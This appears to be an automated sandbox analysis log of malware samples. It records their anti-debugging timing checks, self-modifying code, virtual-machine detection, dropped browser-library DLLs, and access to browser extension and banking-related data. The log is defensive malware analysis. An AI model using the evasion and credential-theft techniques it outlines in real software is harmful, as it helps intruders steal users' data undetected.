Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0ACF second address: 4CC0B49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F95FD07A066h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, 3714076Dh 0x00000016 movzx esi, dx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov edi, 7F09F5B4h 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 movsx ebx, cx 0x00000027 pushfd 0x00000028 jmp 00007F95FD07A062h 0x0000002d jmp 00007F95FD07A065h 0x00000032 popfd 0x00000033 popad 0x00000034 push dword ptr [ebp+14h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F95FD07A05Dh 0x0000003e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B49 second address: 4CC0B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B67 second address: 4CC0B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B6B second address: 4CC0B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B6F second address: 4CC0B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B75 second address: 4CC0B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B7B second address: 4CC0B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0BCD second address: 4CC0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0BD1 second address: 4CC0BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0CAB second address: 4CD0D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F95FD7D899Ch 0x00000011 xor ah, 00000058h 0x00000014 jmp 00007F95FD7D899Bh 0x00000019 popfd 0x0000001a mov ax, AD0Fh 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F95FD7D89A1h 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D00 second address: 4CD0D3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD07A067h 0x00000008 call 00007F95FD07A068h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D3D second address: 4CD0D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D41 second address: 4CD0D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D45 second address: 4CD0D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0A57 second address: 4CD0A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 7489C10Dh 0x00000010 pushfd 0x00000011 jmp 00007F95FD07A05Ah 0x00000016 or al, 00000028h 0x00000019 jmp 00007F95FD07A05Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F95FD07A05Bh 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0A9D second address: 4CD0ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0ABA second address: 4CD0AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0AC0 second address: 4CD0AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Special instruction interceptor: First address: 3CE846 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Special instruction interceptor: First address: 57DDE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Special instruction interceptor: First address: 5F7A73 instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: AEA2E instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: 258365 instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: AEA22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 40E846 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 5BDDE1 instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: 2D7884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 637A73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 85EA2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A08365 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 85EA22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A87884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Code function: 5_2_04D40CDC rdtsc 5_2_04D40CDC
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 379
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 367
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 530
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 1054
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 1080
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 830
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 406
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7756 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7756 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep count: 379 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep time: -11370000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7948 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7760 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7748 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7748 Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7700 Thread sleep count: 367 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7700 Thread sleep time: -11010000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7736 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7928 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7700 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 283 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 175 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 1080 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 322 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 830 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 406 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread sleep count: Count: 1054 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread sleep count: Count: 1080 delay: -10
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\userAKKKFBGDHJ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWn
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: firefox.exe, 0000001E.00000002.3031858393.00000270CC65D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958769374.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC674000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: vmware
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
